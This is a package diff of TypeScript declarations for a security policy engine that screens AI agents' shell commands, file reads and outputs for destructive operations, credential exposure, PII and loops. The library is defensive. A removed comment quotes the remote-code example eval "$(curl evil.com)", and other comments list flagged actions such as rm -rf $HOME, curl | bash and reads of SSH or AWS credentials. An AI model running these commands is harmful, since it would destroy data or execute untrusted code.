@node9/policy-engine 1.0.0 → 1.5.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/dist/index.d.mts +550 -17
- package/dist/index.d.ts +550 -17
- package/dist/index.js +1160 -59
- package/dist/index.mjs +1129 -59
- package/package.json +2 -2
package/dist/index.d.ts
CHANGED
|
@@ -133,20 +133,6 @@ declare function redactText(text: string): {
|
|
|
133
133
|
found: string[];
|
|
134
134
|
};
|
|
135
135
|
|
|
136
|
-
/**
|
|
137
|
-
* Normalizes a bash command string for policy rule matching by replacing
|
|
138
|
-
* pure-literal quoted strings that follow known message flags (e.g. -m, --body)
|
|
139
|
-
* with empty double-quotes. This prevents text inside commit messages and PR
|
|
140
|
-
* descriptions from triggering shell security rules.
|
|
141
|
-
*
|
|
142
|
-
* Unlike a regex-based approach, this uses the AST so it handles all quoting
|
|
143
|
-
* styles correctly and won't over-strip. Execution flags like -c and -e
|
|
144
|
-
* (psql, node, python) are intentionally left alone so their SQL/code
|
|
145
|
-
* content continues to be evaluated by smart rules.
|
|
146
|
-
*
|
|
147
|
-
* Dynamic content (CmdSubst, ParamExp) inside double-quotes is never stripped
|
|
148
|
-
* so patterns like `eval "$(curl evil.com)"` are always preserved.
|
|
149
|
-
*/
|
|
150
136
|
declare function normalizeCommandForPolicy(command: string): string;
|
|
151
137
|
/**
|
|
152
138
|
* AST-based detection of dangerous shell execution patterns.
|
|
@@ -164,6 +150,22 @@ declare function normalizeCommandForPolicy(command: string): string;
|
|
|
164
150
|
declare function detectDangerousShellExec(command: string): 'block' | 'review' | null;
|
|
165
151
|
/** @deprecated Use detectDangerousShellExec — kept for backwards compatibility */
|
|
166
152
|
declare const detectDangerousEval: typeof detectDangerousShellExec;
|
|
153
|
+
interface FsOpVerdict {
|
|
154
|
+
ruleName: string;
|
|
155
|
+
verdict: 'block' | 'review';
|
|
156
|
+
reason: string;
|
|
157
|
+
/** The actual path argument from the user's command — for explainability. */
|
|
158
|
+
path: string;
|
|
159
|
+
}
|
|
160
|
+
declare const BASH_TOOL_NAMES: Set<string>;
|
|
161
|
+
declare function isBashTool(toolName: string): boolean;
|
|
162
|
+
declare const AST_FS_REGEX_RULES: Set<string>;
|
|
163
|
+
/**
|
|
164
|
+
* True when `path` is under $HOME (~ or absolute /home/* or /root) AND not in
|
|
165
|
+
* the tool-managed cache allow-list. Used to gate `rm -rf` on home paths.
|
|
166
|
+
*/
|
|
167
|
+
declare function isProtectedHomePath(rawPath: string): boolean;
|
|
168
|
+
declare function analyzeFsOperation(command: string): FsOpVerdict | null;
|
|
167
169
|
interface ShellCommandAnalysis {
|
|
168
170
|
/** First word of every CallExpr — the command names invoked. */
|
|
169
171
|
actions: string[];
|
|
@@ -313,7 +315,8 @@ declare function isIgnoredTool(toolName: string, config: PolicyConfig): boolean;
|
|
|
313
315
|
declare function matchesPattern(text: string, patterns: string[] | string): boolean;
|
|
314
316
|
/**
|
|
315
317
|
* Reads `obj.a.b.c` style nested keys. Returns null when any segment is
|
|
316
|
-
* missing
|
|
318
|
+
* missing, the parent isn't an object, or the path attempts to walk the
|
|
319
|
+
* prototype chain (`__proto__`, `constructor`, `prototype`).
|
|
317
320
|
*/
|
|
318
321
|
declare function getNestedValue(obj: unknown, path: string): unknown;
|
|
319
322
|
/**
|
|
@@ -409,7 +412,537 @@ interface LoopWindowEvaluation {
|
|
|
409
412
|
*/
|
|
410
413
|
declare function evaluateLoopWindow(records: ToolCallRecord[], tool: string, args: unknown, threshold: number, windowMs: number, now: number): LoopWindowEvaluation;
|
|
411
414
|
|
|
415
|
+
/**
|
|
416
|
+
* One finding extracted from a JSONL delta scan. The host produces these
|
|
417
|
+
* per-line; the engine aggregates them into a summary. `lineIndex` is local
|
|
418
|
+
* to the JSONL file and not exfiltrated outside this struct — only the
|
|
419
|
+
* count of findings matters at the workspace level.
|
|
420
|
+
*/
|
|
421
|
+
interface ScanFinding {
|
|
422
|
+
/** sessionId from the Claude Code JSONL line, used to bucket findings. */
|
|
423
|
+
sessionId: string;
|
|
424
|
+
/**
|
|
425
|
+
* What kind of finding. New extractors should add their own type here
|
|
426
|
+
* rather than overloading existing ones.
|
|
427
|
+
*/
|
|
428
|
+
type: 'dlp' | 'pii' | 'sensitive-file-read' | 'privilege-escalation' | 'network-exfil' | 'pipe-to-shell' | 'eval-of-remote' | 'destructive-op' | 'loop' | 'long-output-redacted';
|
|
429
|
+
/** DLP / PII pattern that matched, e.g. "GitHub Token" or "Email". */
|
|
430
|
+
patternName?: string;
|
|
431
|
+
/** Local line index within the source JSONL — never exfiltrated. */
|
|
432
|
+
lineIndex: number;
|
|
433
|
+
}
|
|
434
|
+
/**
|
|
435
|
+
* Per-signal counts. Adding a new signal extractor means adding a new key
|
|
436
|
+
* here; the FE will render it from this dict without code changes once
|
|
437
|
+
* the chart is wired up.
|
|
438
|
+
*/
|
|
439
|
+
interface ScanSignals {
|
|
440
|
+
dlpFindings: number;
|
|
441
|
+
piiFindings: number;
|
|
442
|
+
sensitiveFileReads: number;
|
|
443
|
+
privilegeEscalation: number;
|
|
444
|
+
networkExfil: number;
|
|
445
|
+
pipeToShell: number;
|
|
446
|
+
evalOfRemote: number;
|
|
447
|
+
destructiveOps: number;
|
|
448
|
+
loops: number;
|
|
449
|
+
longOutputRedactions: number;
|
|
450
|
+
}
|
|
451
|
+
/**
|
|
452
|
+
* Compact, network-safe summary of a scan delta. This is the shape the
|
|
453
|
+
* proxy sends to the SaaS on every policy-sync tick. The SaaS persists it
|
|
454
|
+
* per-machine (1:1 with apiKey) and aggregates across the workspace for
|
|
455
|
+
* the dashboard's Recent Exposure card.
|
|
456
|
+
*
|
|
457
|
+
* `score` follows the same 0-100 scale as blast: higher is cleaner. We
|
|
458
|
+
* deduct per finding type based on severity weights (see `computeScanScore`
|
|
459
|
+
* below), capped so a noisy session doesn't bottom out the score on its own.
|
|
460
|
+
*/
|
|
461
|
+
interface ScanSummary {
|
|
462
|
+
/** Number of distinct sessionIds touched by this scan delta. */
|
|
463
|
+
totalSessions: number;
|
|
464
|
+
/** Total tool-call lines parsed across all deltas. */
|
|
465
|
+
totalToolCalls: number;
|
|
466
|
+
/** Per-signal counts. */
|
|
467
|
+
signals: ScanSignals;
|
|
468
|
+
/**
|
|
469
|
+
* Top DLP/PII pattern names by count, descending. Truncated to topN to
|
|
470
|
+
* keep payload small. Only pattern *names*; samples never surface here.
|
|
471
|
+
*/
|
|
472
|
+
topPatterns: Array<{
|
|
473
|
+
patternName: string;
|
|
474
|
+
count: number;
|
|
475
|
+
}>;
|
|
476
|
+
/** 0-100 cleanliness score. */
|
|
477
|
+
score: number;
|
|
478
|
+
}
|
|
479
|
+
/**
|
|
480
|
+
* Per-finding-type score deduction. Tuned so:
|
|
481
|
+
* - One credential leak (-30) drops the score from 100 to 70 — at-risk
|
|
482
|
+
* territory, demands attention.
|
|
483
|
+
* - One destructive op (-15) is a yellow flag.
|
|
484
|
+
* - One loop (-3) is mild noise; many loops still add up.
|
|
485
|
+
* Total deduction is capped at 100 so the score never goes negative.
|
|
486
|
+
*
|
|
487
|
+
* Exported so the SaaS Report can reuse the same severity ladder when
|
|
488
|
+
* blending scan signals into the workspace risk score (see
|
|
489
|
+
* `classifyScanSignal` in ../severity).
|
|
490
|
+
*/
|
|
491
|
+
declare const SCAN_SIGNAL_WEIGHTS: Record<keyof ScanSignals, number>;
|
|
492
|
+
/**
|
|
493
|
+
* Compute the 0-100 cleanliness score. Public so other engine consumers
|
|
494
|
+
* can use the same weights without round-tripping through summarizeScan.
|
|
495
|
+
*/
|
|
496
|
+
declare function computeScanScore(signals: ScanSignals): number;
|
|
497
|
+
declare const LOOP_THRESHOLD_FOR_WASTE = 3;
|
|
498
|
+
declare const COST_PER_LOOP_ITER_USD = 0.006;
|
|
499
|
+
/**
|
|
500
|
+
* Build the network-safe summary from a list of findings + total tool-call
|
|
501
|
+
* count. Deterministic: given the same input the output is identical
|
|
502
|
+
* (important for SaaS-side dedup and ETag-style caching of subsequent
|
|
503
|
+
* tick payloads).
|
|
504
|
+
*
|
|
505
|
+
* Top patterns are sorted by count desc, then alphabetically for stable
|
|
506
|
+
* ordering across calls. topN defaults to 10.
|
|
507
|
+
*/
|
|
508
|
+
declare function summarizeScan(findings: ScanFinding[], opts?: {
|
|
509
|
+
totalToolCalls?: number;
|
|
510
|
+
topN?: number;
|
|
511
|
+
}): ScanSummary;
|
|
512
|
+
|
|
513
|
+
type Severity = 'critical' | 'high' | 'medium';
|
|
514
|
+
type ScoreTier = 'good' | 'at-risk' | 'critical';
|
|
515
|
+
/**
|
|
516
|
+
* Classify a rule by its name + verdict. Used by the proxy when scanning a
|
|
517
|
+
* Claude Code session — the rule that matched is known by name.
|
|
518
|
+
*
|
|
519
|
+
* Tiers:
|
|
520
|
+
* - critical: irreversible damage or credential exfiltration
|
|
521
|
+
* (rm -rf $HOME, eval-of-remote, AWS/SSH/GCP credential reads,
|
|
522
|
+
* repo deletion, helm uninstall, drop-table, drop-database, flushall,
|
|
523
|
+
* curl | bash, pipe-shell)
|
|
524
|
+
* - high: significant damage, recoverable
|
|
525
|
+
* (force push, git reset --hard, rebase, branch deletion, all other
|
|
526
|
+
* block-verdict rules)
|
|
527
|
+
* - medium: workflow / cost risk, not security
|
|
528
|
+
* (rm review, sudo review, redis config-set, dynamic eval, all other
|
|
529
|
+
* review-verdict rules)
|
|
530
|
+
*/
|
|
531
|
+
declare function classifyRuleSeverity(name: string, verdict: 'block' | 'review' | 'allow'): Severity;
|
|
532
|
+
/**
|
|
533
|
+
* Map a rule slug to a friendly label suitable for narrative output.
|
|
534
|
+
*
|
|
535
|
+
* "block-read-aws" → "AWS credentials read"
|
|
536
|
+
* "shield:k8s:block-helm-uninstall" → "helm uninstall"
|
|
537
|
+
* "review-force-push" → "force pushes"
|
|
538
|
+
*
|
|
539
|
+
* Strips common prefixes (block-, review-, allow-, shield:..., org:) before
|
|
540
|
+
* matching, so cloud-tagged rules ("org:block-read-aws") map the same way.
|
|
541
|
+
*/
|
|
542
|
+
declare function narrativeRuleLabel(name: string): string;
|
|
543
|
+
/**
|
|
544
|
+
* Audit-log entry for backend classification. Mirrors the relevant subset of
|
|
545
|
+
* AuditLog rows so backend code can pass them in without a Prisma dependency
|
|
546
|
+
* here.
|
|
547
|
+
*/
|
|
548
|
+
interface AuditEntryForClassify {
|
|
549
|
+
checkedBy?: string | null;
|
|
550
|
+
toolName: string;
|
|
551
|
+
action: string;
|
|
552
|
+
riskMetadata?: {
|
|
553
|
+
ruleName?: string;
|
|
554
|
+
dlpPattern?: string;
|
|
555
|
+
[k: string]: unknown;
|
|
556
|
+
} | null;
|
|
557
|
+
}
|
|
558
|
+
/**
|
|
559
|
+
* Classify a single audit-log entry by what fired and which tool ran. Used by
|
|
560
|
+
* the SaaS /report endpoint to bucket audit events into severity tiers.
|
|
561
|
+
*
|
|
562
|
+
* Resolution order — first hit wins:
|
|
563
|
+
* 1. riskMetadata.ruleName → defer to classifyRuleSeverity (best signal)
|
|
564
|
+
* 2. checkedBy === 'dlp-block' or starts with 'dlp-saas:' → critical
|
|
565
|
+
* (any credential leak is critical regardless of which pattern matched)
|
|
566
|
+
* 3. checkedBy starts with 'eval-saas' or 'pipe-chain-saas:critical' → critical
|
|
567
|
+
* 4. checkedBy === 'loop-detected' → medium (cost / workflow, not security)
|
|
568
|
+
* 5. Block-status entries with no rule name → high (default for unattributed
|
|
569
|
+
* blocks; better than dropping the signal)
|
|
570
|
+
* 6. Otherwise → null (allowed actions don't have a severity)
|
|
571
|
+
*/
|
|
572
|
+
declare function classifyAuditEntry(entry: AuditEntryForClassify): Severity | null;
|
|
573
|
+
/**
|
|
574
|
+
* Compute a 0-100 risk-posture score from severity counts + total events.
|
|
575
|
+
*
|
|
576
|
+
* Heuristic: each severity tier has a "cost" against a clean 100 score.
|
|
577
|
+
* Critical findings deduct the most, medium the least. Counts are normalised
|
|
578
|
+
* by total events so a workspace with 1 critical out of 10 events scores
|
|
579
|
+
* worse than one with 1 critical out of 10,000 — exposure rate matters more
|
|
580
|
+
* than absolute count.
|
|
581
|
+
*
|
|
582
|
+
* Tiers:
|
|
583
|
+
* - good : score ≥ 80
|
|
584
|
+
* - at-risk : 50 ≤ score < 80
|
|
585
|
+
* - critical : score < 50
|
|
586
|
+
*
|
|
587
|
+
* Empty workspaces (total === 0) score 100/good — no evidence of exposure
|
|
588
|
+
* is the only honest answer.
|
|
589
|
+
*/
|
|
590
|
+
declare function computeSecurityScore(opts: {
|
|
591
|
+
critical: number;
|
|
592
|
+
high: number;
|
|
593
|
+
medium: number;
|
|
594
|
+
total: number;
|
|
595
|
+
}): {
|
|
596
|
+
score: number;
|
|
597
|
+
tier: ScoreTier;
|
|
598
|
+
};
|
|
599
|
+
/**
|
|
600
|
+
* Map a ScanSignals key to its severity tier. Uses the existing
|
|
601
|
+
* SCAN_SIGNAL_WEIGHTS so adding a new scan signal type only requires
|
|
602
|
+
* updating the weights table; classification follows automatically.
|
|
603
|
+
*
|
|
604
|
+
* Thresholds:
|
|
605
|
+
* - ≥ 25 → critical (dlp, pipeToShell, evalOfRemote, networkExfil)
|
|
606
|
+
* - ≥ 11 → high (sensitiveFileReads, privilegeEscalation,
|
|
607
|
+
* destructiveOps)
|
|
608
|
+
* - else → medium (piiFindings, loops, longOutputRedactions)
|
|
609
|
+
*/
|
|
610
|
+
declare function classifyScanSignal(key: keyof ScanSignals): Severity;
|
|
611
|
+
/**
|
|
612
|
+
* Compute a 0-100 risk-posture score that blends audit-log severity counts
|
|
613
|
+
* with forward-only scan signal counts.
|
|
614
|
+
*
|
|
615
|
+
* Why this exists: the live audit log answers "what did the firewall block
|
|
616
|
+
* in this window?" and the scan answers "what's sitting in past sessions?".
|
|
617
|
+
* Both are real risk; surfacing them as two separate scores forced users
|
|
618
|
+
* to reconcile two numbers. This function bins scan signals into the same
|
|
619
|
+
* critical/high/medium buckets via classifyScanSignal, sums them with the
|
|
620
|
+
* audit counts, and runs the existing computeSecurityScore math.
|
|
621
|
+
*
|
|
622
|
+
* Denominator handling: a workspace with zero audit traffic but non-zero
|
|
623
|
+
* scan findings would otherwise hit the `total === 0` short-circuit and
|
|
624
|
+
* return 100/good — a false-healthy reading. We add the scan contribution
|
|
625
|
+
* to `total` so the rate-based math runs:
|
|
626
|
+
*
|
|
627
|
+
* - If `scan.totalToolCalls` is provided, use it as the scan-side
|
|
628
|
+
* denominator (best signal — "1 finding per 10000 calls" should
|
|
629
|
+
* score better than "1 per 10").
|
|
630
|
+
* - Otherwise fall back to the count of scan findings, so a scan-only
|
|
631
|
+
* workspace with one credential leak resolves to 1/1 = 100% bad
|
|
632
|
+
* rate and lands in critical, not 0/0 = 100/good.
|
|
633
|
+
*
|
|
634
|
+
* Backwards compatible: calling with `audit` only and no `scan` produces
|
|
635
|
+
* the exact same result as `computeSecurityScore(audit)`.
|
|
636
|
+
*/
|
|
637
|
+
declare function computeBlendedSecurityScore(opts: {
|
|
638
|
+
audit: {
|
|
639
|
+
critical: number;
|
|
640
|
+
high: number;
|
|
641
|
+
medium: number;
|
|
642
|
+
total: number;
|
|
643
|
+
};
|
|
644
|
+
scan?: {
|
|
645
|
+
signals: ScanSignals;
|
|
646
|
+
totalToolCalls?: number;
|
|
647
|
+
};
|
|
648
|
+
}): {
|
|
649
|
+
score: number;
|
|
650
|
+
tier: ScoreTier;
|
|
651
|
+
};
|
|
652
|
+
|
|
653
|
+
/**
|
|
654
|
+
* One sensitive path that the blast walker found readable on disk.
|
|
655
|
+
* `score` is the per-finding deduction this path contributes to the
|
|
656
|
+
* machine's overall blast-radius score (100 = clean).
|
|
657
|
+
*/
|
|
658
|
+
interface BlastFinding {
|
|
659
|
+
/** Absolute path on disk. May be home-relative ("~/.aws/credentials"). */
|
|
660
|
+
full: string;
|
|
661
|
+
/** Display label — short form for UI ("~/.ssh/id_rsa", ".env (cwd)"). */
|
|
662
|
+
label: string;
|
|
663
|
+
/** One-line explanation of why this path matters. */
|
|
664
|
+
description: string;
|
|
665
|
+
/** Points deducted from the 100-point score when this path is reachable. */
|
|
666
|
+
score: number;
|
|
667
|
+
}
|
|
668
|
+
/** One environment variable the DLP scanner flagged as a credential. */
|
|
669
|
+
interface BlastEnvFinding {
|
|
670
|
+
/** Variable name, e.g. "AWS_SECRET_ACCESS_KEY". */
|
|
671
|
+
key: string;
|
|
672
|
+
/** DLP pattern that matched, e.g. "AWS Access Key". */
|
|
673
|
+
patternName: string;
|
|
674
|
+
}
|
|
675
|
+
/** Full result of a blast walk on one machine. */
|
|
676
|
+
interface BlastResult {
|
|
677
|
+
reachable: BlastFinding[];
|
|
678
|
+
envFindings: BlastEnvFinding[];
|
|
679
|
+
/** 0-100. Higher is better. */
|
|
680
|
+
score: number;
|
|
681
|
+
}
|
|
682
|
+
/**
|
|
683
|
+
* Compact, network-safe summary of a blast result. This is the shape the
|
|
684
|
+
* proxy sends to the SaaS and the SaaS persists per machine. We deliberately
|
|
685
|
+
* DO NOT send file contents, full paths, or sample values — only:
|
|
686
|
+
* - the score (already aggregate)
|
|
687
|
+
* - a count of how many things were exposed
|
|
688
|
+
* - the top-N worst paths' sanitised labels (truncated to 2 segments)
|
|
689
|
+
*
|
|
690
|
+
* The sanitisation step lives here in the engine so both the proxy (before
|
|
691
|
+
* send) and the SaaS (when validating) reference identical logic.
|
|
692
|
+
*/
|
|
693
|
+
interface BlastSummary {
|
|
694
|
+
/** 0-100. Same as BlastResult.score. */
|
|
695
|
+
score: number;
|
|
696
|
+
/** reachable.length + envFindings.length — total exposure count. */
|
|
697
|
+
exposureCount: number;
|
|
698
|
+
/**
|
|
699
|
+
* Top-N worst findings (sorted by individual score deduction desc).
|
|
700
|
+
* Paths are truncated to the last 2 segments so we never exfiltrate
|
|
701
|
+
* project-layout details ("payments-prod/.env.production") — only the
|
|
702
|
+
* basename + parent ("payments-prod/.env.production" → ".env.production"
|
|
703
|
+
* if 1-segment, "payments-prod/.env.production" if 2-segment).
|
|
704
|
+
*/
|
|
705
|
+
worstPaths: Array<{
|
|
706
|
+
path: string;
|
|
707
|
+
score: number;
|
|
708
|
+
}>;
|
|
709
|
+
/** Number of env vars flagged as credentials. No keys included. */
|
|
710
|
+
envExposureCount: number;
|
|
711
|
+
}
|
|
712
|
+
/**
|
|
713
|
+
* Sanitise a sensitive path for transmission. Keeps only the trailing 2
|
|
714
|
+
* segments — enough to identify the kind of file ("~/.aws/credentials"
|
|
715
|
+
* stays useful, "/Users/alice/Code/payments-prod/.env" becomes
|
|
716
|
+
* "payments-prod/.env" which doesn't reveal the home dir or directory tree).
|
|
717
|
+
*
|
|
718
|
+
* Edge cases:
|
|
719
|
+
* - Already short paths (≤2 segments) are returned as-is.
|
|
720
|
+
* - Paths with a leading "~" are kept as-is up to 2 segments.
|
|
721
|
+
* - Empty strings return "".
|
|
722
|
+
*
|
|
723
|
+
* Exported for unit tests + reuse anywhere a path needs the same treatment.
|
|
724
|
+
*/
|
|
725
|
+
declare function truncateBlastPath(full: string): string;
|
|
726
|
+
/**
|
|
727
|
+
* Build the network-safe summary from a full BlastResult. Deterministic:
|
|
728
|
+
* given the same input the output is identical (important for caching /
|
|
729
|
+
* deduplication on the SaaS side). Top-N defaults to 5, configurable for
|
|
730
|
+
* tests.
|
|
731
|
+
*/
|
|
732
|
+
declare function summarizeBlast(result: BlastResult, opts?: {
|
|
733
|
+
topN?: number;
|
|
734
|
+
}): BlastSummary;
|
|
735
|
+
|
|
736
|
+
/**
|
|
737
|
+
* Destructive-op regex. Word-boundary anchored so partial matches don't
|
|
738
|
+
* fire (e.g. "term" inside "terminate" wouldn't match `\brm\b`). Each
|
|
739
|
+
* pattern is independently provable as destructive — no fuzzy heuristics.
|
|
740
|
+
*/
|
|
741
|
+
declare const DESTRUCTIVE_OP_RE: RegExp;
|
|
742
|
+
/**
|
|
743
|
+
* Historical privilege-escalation regex. **No longer used by the canonical
|
|
744
|
+
* detector** — scan/canonical.ts moved sudo/su, chmod, and chown all to
|
|
745
|
+
* AST tokenization (analyzeShellCommand actions + allTokens) so:
|
|
746
|
+
* - Quoting bypasses (`s''udo`, `c\hmod`) don't slip past the matcher.
|
|
747
|
+
* - String literals like `echo "chmod 777 done"` or `cat /etc/sudoers`
|
|
748
|
+
* stop firing false positives — those don't put the action name in
|
|
749
|
+
* `actions`, only in `allTokens` (a Lit, not a CallExpr first-word).
|
|
750
|
+
*
|
|
751
|
+
* Kept as a public export for non-AST consumers that grep raw command
|
|
752
|
+
* strings (smart-rule conditions that match on the literal command text)
|
|
753
|
+
* and as documentation of the historical pattern set. Removing it would
|
|
754
|
+
* be a breaking change for downstream package consumers.
|
|
755
|
+
*/
|
|
756
|
+
declare const PRIVILEGE_ESCALATION_RE: RegExp;
|
|
757
|
+
/**
|
|
758
|
+
* Sensitive file paths the agent shouldn't be reading via tool calls.
|
|
759
|
+
* Mirrors the blast walker's path set — same files matter, here detected
|
|
760
|
+
* at tool-call-time rather than fs-walk-time.
|
|
761
|
+
*
|
|
762
|
+
* `\b` boundaries on names so substring noise doesn't trigger; the
|
|
763
|
+
* patterns assume the proxy normalises ~ in inputs (which it does
|
|
764
|
+
* via path expansion before we see them).
|
|
765
|
+
*/
|
|
766
|
+
declare const SENSITIVE_PATH_RE: RegExp;
|
|
767
|
+
/**
|
|
768
|
+
* Tool names that read or grep file contents. Used to gate SENSITIVE_PATH_RE
|
|
769
|
+
* to file-reading tools so the same path appearing in a Bash command doesn't
|
|
770
|
+
* double-count against a Read of the same file.
|
|
771
|
+
*/
|
|
772
|
+
declare const FILE_TOOLS: Set<string>;
|
|
773
|
+
|
|
774
|
+
type PiiPattern = 'Email' | 'SSN' | 'Phone' | 'Credit Card';
|
|
775
|
+
/**
|
|
776
|
+
* Detect PII patterns in a string. Returns a deduplicated list — one entry
|
|
777
|
+
* per distinct pattern type, never multiple "Email" findings from one input.
|
|
778
|
+
*/
|
|
779
|
+
declare function detectPii(text: string): PiiPattern[];
|
|
780
|
+
|
|
781
|
+
type CanonicalFindingType = 'smart-rule' | 'ast-fs-op' | 'dlp' | 'pii' | 'sensitive-file-read' | 'privilege-escalation' | 'destructive-op' | 'pipe-to-shell' | 'eval-of-remote' | 'loop' | 'long-output-redacted';
|
|
782
|
+
type CanonicalAgent = 'claude' | 'gemini' | 'codex' | 'shell';
|
|
783
|
+
type CanonicalSourceType = 'default' | 'shield' | 'user' | 'engine';
|
|
784
|
+
interface CanonicalFinding {
|
|
785
|
+
/** Discriminator. Maps 1:1 to ScanFinding.type for the SaaS upload. */
|
|
786
|
+
type: CanonicalFindingType;
|
|
787
|
+
/**
|
|
788
|
+
* Stable rule identifier. For type='smart-rule' / 'ast-fs-op' it's the
|
|
789
|
+
* rule name (e.g. 'block-rm-rf-home', 'shield:project-jail:block-read-ssh').
|
|
790
|
+
* For built-in detector findings (PII, DLP, regex), a synthetic name keyed
|
|
791
|
+
* on the detector + pattern (e.g. 'pii:email', 'dlp:GitHub Token').
|
|
792
|
+
*/
|
|
793
|
+
ruleName: string;
|
|
794
|
+
/** Block or review. Findings only exist for fired rules — no allow/info. */
|
|
795
|
+
verdict: 'block' | 'review';
|
|
796
|
+
/** Severity tier. Single source of truth — produced once at the engine. */
|
|
797
|
+
severity: Severity;
|
|
798
|
+
/** Engine-generated reason. Never carries user PII or raw secrets. */
|
|
799
|
+
reason: string;
|
|
800
|
+
/** Pattern name for DLP/PII (e.g. 'GitHub Token', 'Email'). */
|
|
801
|
+
patternName?: string;
|
|
802
|
+
/** Tool that produced the call. */
|
|
803
|
+
toolName: string;
|
|
804
|
+
agent: CanonicalAgent;
|
|
805
|
+
sessionId: string;
|
|
806
|
+
/** Project label or working directory the session lives in. */
|
|
807
|
+
project: string;
|
|
808
|
+
/** Local JSONL line offset. Never exfiltrated; used for dedupe. */
|
|
809
|
+
lineIndex: number;
|
|
810
|
+
/** Where the rule came from. 'engine' for built-in detectors. */
|
|
811
|
+
sourceType: CanonicalSourceType;
|
|
812
|
+
/** Optional shield/source label for UI. */
|
|
813
|
+
shieldLabel?: string;
|
|
814
|
+
/** When this exact (post-dedupe) finding was first / last seen. */
|
|
815
|
+
firstSeenAt: string;
|
|
816
|
+
lastSeenAt: string;
|
|
817
|
+
/** Post-dedupe match count. 1 by default, N for N collapsed raw matches. */
|
|
818
|
+
occurrenceCount: number;
|
|
819
|
+
/** AST findings: the path that triggered the verdict. */
|
|
820
|
+
subjectPath?: string;
|
|
821
|
+
/** Loop findings: dollar cost so far. Loop-only today; optional everywhere. */
|
|
822
|
+
costUsd?: number;
|
|
823
|
+
/** Loop findings: number of iterations. */
|
|
824
|
+
loopCount?: number;
|
|
825
|
+
loopKind?: 'loop' | 'long-iteration';
|
|
826
|
+
/** Loop findings: a sanitized command preview for UI. */
|
|
827
|
+
commandPreview?: string;
|
|
828
|
+
/** Raw tool input. Local CLI render only. */
|
|
829
|
+
input?: Record<string, unknown>;
|
|
830
|
+
/** DLP UI: first/last chars of the matched value with the middle replaced. */
|
|
831
|
+
redactedSample?: string;
|
|
832
|
+
}
|
|
833
|
+
/**
|
|
834
|
+
* Normalized per-call entry the per-line extractor consumes. Hosts (CLI
|
|
835
|
+
* scan, daemon, backfill) parse agent-specific JSONL into this shape so
|
|
836
|
+
* extractCanonicalFindings doesn't have to know about Claude vs Gemini vs
|
|
837
|
+
* Codex line layouts.
|
|
838
|
+
*/
|
|
839
|
+
interface ToolCallEntry {
|
|
840
|
+
toolName: string;
|
|
841
|
+
args: Record<string, unknown>;
|
|
842
|
+
timestamp: string;
|
|
843
|
+
/** Bytes of tool result content for long-output detection. 0 / undefined
|
|
844
|
+
* for non-result entries. */
|
|
845
|
+
outputBytes?: number;
|
|
846
|
+
}
|
|
847
|
+
interface ExtractContext {
|
|
848
|
+
sessionId: string;
|
|
849
|
+
lineIndex: number;
|
|
850
|
+
project: string;
|
|
851
|
+
agent: CanonicalAgent;
|
|
852
|
+
rules: ReadonlyArray<{
|
|
853
|
+
rule: SmartRule;
|
|
854
|
+
sourceType: CanonicalSourceType;
|
|
855
|
+
shieldLabel?: string;
|
|
856
|
+
}>;
|
|
857
|
+
/** toolInspection map from PolicyConfig — drives shell-command extraction
|
|
858
|
+
* for tools that aren't the standard 'bash' name. Defaults handled by caller. */
|
|
859
|
+
toolInspection: Record<string, string>;
|
|
860
|
+
/** DLP enabled flag from PolicyConfig. */
|
|
861
|
+
dlpEnabled: boolean;
|
|
862
|
+
}
|
|
863
|
+
interface SessionExtractContext {
|
|
864
|
+
sessionId: string;
|
|
865
|
+
project: string;
|
|
866
|
+
agent: CanonicalAgent;
|
|
867
|
+
/**
|
|
868
|
+
* Loop-detection window settings. Mirrors PolicyConfig.policy.loopDetection.
|
|
869
|
+
*
|
|
870
|
+
* `windowSeconds: 0` means "no window" — count all matching calls in the
|
|
871
|
+
* session regardless of timing. This is the right setting for historical
|
|
872
|
+
* backfill (--upload-history): an agent that hammered the same Edit on
|
|
873
|
+
* the same file 126 times across hours is the loop pattern users care
|
|
874
|
+
* about, but a 120s window would never fire on it. The live hook keeps
|
|
875
|
+
* the small window because it's racing against an actively running agent.
|
|
876
|
+
*/
|
|
877
|
+
loopDetection: {
|
|
878
|
+
enabled: boolean;
|
|
879
|
+
threshold: number;
|
|
880
|
+
windowSeconds: number;
|
|
881
|
+
};
|
|
882
|
+
}
|
|
883
|
+
interface SessionToolCall extends ToolCallEntry {
|
|
884
|
+
/** Local JSONL line where this call lived — propagates to the loop finding. */
|
|
885
|
+
lineIndex: number;
|
|
886
|
+
}
|
|
887
|
+
declare const LONG_OUTPUT_THRESHOLD_BYTES: number;
|
|
888
|
+
/**
|
|
889
|
+
* Wire-format identity of the canonical detector pipeline. Bumped when
|
|
890
|
+
* extractCanonicalFindings (and friends) change their output in a way
|
|
891
|
+
* that would invalidate verdicts already recorded against the previous
|
|
892
|
+
* version. The daemon stores this in ~/.node9/scan-watermark.json and
|
|
893
|
+
* triggers a one-time re-scan when its persisted value falls behind.
|
|
894
|
+
*
|
|
895
|
+
* Bump it when:
|
|
896
|
+
* - adding/removing a CanonicalFindingType
|
|
897
|
+
* - changing severity classification for an existing type
|
|
898
|
+
* - changing dedupe keys (would silently re-bucket existing findings)
|
|
899
|
+
* - any semantic change to the detectors that affects emitted counts
|
|
900
|
+
*
|
|
901
|
+
* Don't bump for:
|
|
902
|
+
* - comment-only edits
|
|
903
|
+
* - jsdoc tweaks
|
|
904
|
+
* - refactors that demonstrably preserve output
|
|
905
|
+
*
|
|
906
|
+
* scripts/check-extractor-version.mjs hashes the detector source files
|
|
907
|
+
* and fails CI when the hash drifts without a version bump — forgetting
|
|
908
|
+
* is loud, not silent.
|
|
909
|
+
*/
|
|
910
|
+
declare const CANONICAL_EXTRACTOR_VERSION = "canonical-v4";
|
|
911
|
+
/**
|
|
912
|
+
* SHA-256 prefix of the detector-source files
|
|
913
|
+
* (canonical.ts + pii.ts + destructive-regex.ts).
|
|
914
|
+
*
|
|
915
|
+
* Updated by `npm run bump-extractor-version`. The CI gate in
|
|
916
|
+
* `.github/workflows/ci.yml` recomputes the hash on every push and fails
|
|
917
|
+
* if it doesn't match this constant — the contract is "if any of those
|
|
918
|
+
* files changed, this hash must change too, and you must consciously
|
|
919
|
+
* decide whether to bump CANONICAL_EXTRACTOR_VERSION."
|
|
920
|
+
*/
|
|
921
|
+
declare const CANONICAL_EXTRACTOR_HASH = "64a6a63a27f4646f";
|
|
922
|
+
declare function extractCanonicalFindings(call: ToolCallEntry, ctx: ExtractContext): CanonicalFinding[];
|
|
923
|
+
